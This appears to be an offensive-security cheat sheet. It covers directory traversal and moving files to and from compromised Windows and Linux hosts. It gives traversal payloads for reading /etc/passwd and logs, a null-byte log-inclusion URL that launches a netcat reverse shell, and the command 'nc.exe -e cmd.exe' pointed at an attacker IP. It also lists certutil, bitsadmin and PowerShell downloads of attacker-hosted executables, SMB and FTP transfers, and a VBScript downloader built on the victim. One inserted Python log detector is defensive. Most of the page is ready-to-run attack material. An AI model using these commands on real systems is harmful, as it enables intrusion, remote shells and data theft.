# File transfer

## Directory traversal

### What is it?

Directory Traversal, also known as Path Traversal, is a vulnerability that allows an attacker to read files on the victim’s system by manipulating file paths used in the application.

**A simple example:**

A vulnerable web application may expose an endpoint such as /get_file?path={filepath}. When a request is made, the application returns the content of the specified file. If an attacker inserts a path such as ../../../etc/passwd into {filepath}, the application fetches that file, and if its contents are sent back in the response, the attacker can read sensitive system information.

Remember that a payload or attack may change depending on the application and the server's file system. Directory Traversal can often lead to:

* Sensitive data exposure
* System information disclosure

**Other learning resources:**

PortSwigger: <https://portswigger.net/web-security/file-path-traversal>

### Checklist

* [ ] What is the technology stack you're attacking?
* [ ] What application/framework is being used?
* [ ] Is it PHP, Java, Python, .NET, etc.?
* [ ] Verify injection points
  * [ ] URL parameters
  * [ ] Form fields
  * [ ] HTTP headers (e.g. cookies, etc)
* [ ] Check if you can traverse to directories outside of the webroot:
  * [ ] ../../../../etc/passwd
  * [ ] ../../../../Windows/System32/config/SAM (Windows)
* [ ] Is there a blocklist?
* [ ] Is there a filter?
* [ ] Is the filter recursive?
* [ ] Is the filter on single characters or sets? (e.g. / vs ../)
* [ ] Can you bypass the blocklist?
* [ ] Is a specific extension required?
* [ ] Can you read a sensitive file with allowed extensions?
* [ ] Can you bypass with:
  * [ ] Null byte? %00
  * [ ] Encoding
  * [ ] Double encoding
  * [ ] URL encoding
  * [ ] Unicode encoding
* [ ] Test for log exposure
* [ ] Can you read log files?
* [ ] Other unexpected bypasses, e.g. ../../ in the middle of the path

### Exploitation

Basic directory traversal

```
../../../../etc/passwd
```

Reading application's own configuration files

```
../../webapp/config/database.ini
```

Log exposure

```
../../../../var/log/apache2/access.log
```

Non-recursive filter bypass

```
..././..././..././..././..././..././etc/passwd
```
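As an added example (not from the original page), a small detector that runs over Apache access-log lines and flags the traversal forms listed above: plain `../`, the `..././` non-recursive-filter bypass, double encoding and a null byte. The log lines, hosts and application paths are constructed for the example.

```python
import re
import urllib.parse

# Constructed Apache access-log lines (hypothetical hosts); targets mirror the payloads above.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2024:10:00:01 +0000] "GET /get_file?path=images/logo.png HTTP/1.1" 200 512
10.0.0.9 - - [10/Jan/2024:10:00:02 +0000] "GET /get_file?path=../../../../etc/passwd HTTP/1.1" 200 1843
10.0.0.9 - - [10/Jan/2024:10:00:03 +0000] "GET /get_file?path=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843
10.0.0.9 - - [10/Jan/2024:10:00:04 +0000] "GET /get_file?path=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0
10.0.0.9 - - [10/Jan/2024:10:00:05 +0000] "GET /get_file?path=..././..././etc/passwd HTTP/1.1" 200 1843
10.0.0.9 - - [10/Jan/2024:10:00:06 +0000] "GET /addguestbook.php?LANG=../../xampp/apache/logs/access.log%00 HTTP/1.1" 200 9001
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" \d{3}')
# A segment of two or more dots only: '..' and the '...' left when a non-recursive strip removes '../' from '..././'.
DOT_SEGMENT_RE = re.compile(r'(^|[\\/])\.{2,}([\\/]|$)')

def decode_levels(value, max_rounds=3):
    # value plus each further percent-decoding until it stops changing
    forms = [value]
    for _ in range(max_rounds):
        nxt = urllib.parse.unquote(forms[-1])
        if nxt == forms[-1]:
            break
        forms.append(nxt)
    return forms

def suspicious_reasons(target):
    # flag traversal or NUL bytes in the URL path or in any query value
    parts = urllib.parse.urlsplit(target)
    # parse_qsl already applies the single decode the server itself performs
    fields = [("url-path", parts.path)] + urllib.parse.parse_qsl(parts.query, keep_blank_values=True)
    reasons = set()
    for name, value in fields:
        for rounds, form in enumerate(decode_levels(value)):
            prefix = "" if rounds == 0 else "double-encoded "
            if DOT_SEGMENT_RE.search(form):
                reasons.add(f"{prefix}traversal in {name}")
            if "\x00" in form:
                reasons.add(f"{prefix}NUL byte in {name}")
    return sorted(reasons)

def scan_log(text):
    # (client ip, request target, reasons) for each line that raises a flag
    hits = []
    for m in filter(None, map(LOG_RE.match, text.splitlines())):
        reasons = suspicious_reasons(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits
```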

### Tools

## Web Server

<https://github.com/sc0tfree/updog>

Install and run updog:

```bash
pip3 install updog
updog
updog -d /another/directory
updog -p 1234
updog --password examplePassword123!
updog --ssl
```

Simple Python HTTP server:

```bash
# Python 2
python -m SimpleHTTPServer 8080
```

## FTP Server

Start a Twisted FTP server:

```bash
twistd -n ftp -p 21 --root /path/
```

From the victim, upload a file to your FTP server:

```bash
curl -T out.txt ftp://10.10.15.229
```

Example FTP download script for the Windows ftp client, created on the victim from a reverse shell and then run (the client reads its commands from the file):

```bat
:: Create ftp script (on victim)
echo open 10.11.1.111 > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt

:: Execute
ftp -v -n -s:ftp.txt
```

## TFTP Server

On Kali:

```bash
atftpd --daemon --port 69 /tftp
```

From a Windows reverse shell (download netcat and execute):

```
tftp -i 10.11.1.111 GET nc.exe
nc.exe -e cmd.exe 10.11.1.111 4444
```

Example vulnerable URL (uses a null byte to include the Apache access log and run nc.exe):

```
http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=nc.exe%20-e%20cmd.exe%2010.11.0.105%204444
```

## Windows — File Transfer Methods

Bitsadmin:

```powershell
bitsadmin /transfer mydownloadjob /download /priority normal http://<attacker-host>/xyz.exe C:\Users\%USERNAME%\AppData\local\temp\xyz.exe
```

Certutil:

```powershell
certutil.exe -urlcache -split -f "http://10.11.1.111/Powerless.bat" Powerless.bat
```

Powershell:

```powershell
(New-Object System.Net.WebClient).DownloadFile("http://10.11.1.111/CLSID.list","C:\Users\Public\CLSID.list")
invoke-webrequest -Uri http://10.10.14.19:9090/PowerUp.ps1 -OutFile powerup.ps1
```

FTP (from a reverse shell — see FTP Server section above for full FTP script)

## SMB Server

Run an SMB share using Impacket's smbserver:

```bash
# Python 2 impacket example path (older distributions)
python /usr/share/doc/python-impacket/examples/smbserver.py Lab "/root/labs/public/10.11.1.111" -u usuario -p pass

# Python 3 impacket example path
python /usr/share/doc/python3-impacket/examples/smbserver.py Lab "/root/htb/169-resolute/smb"
```

Or configure Samba by editing /etc/samba/smb.conf (example configuration):

```ini
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
```

Set permissions and restart Samba:

```bash
chmod -R 777 smb_path
chown -R nobody:nobody smb_path
service smbd restart
```

From a victim machine with a reverse shell:

* Download from SMB share:

```
copy \\10.11.1.111\Lab\wce.exe .
```

* Upload to SMB share:

```
copy wtf.jpg \\10.11.1.111\Lab
```

## VBScript downloader (create on the victim)

Create wget.vbs via echoed lines and execute:

```bat
:: Create wget.vbs (on victim)
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

:: Execute
cscript wget.vbs http://10.11.1.111/file.exe file.exe
```
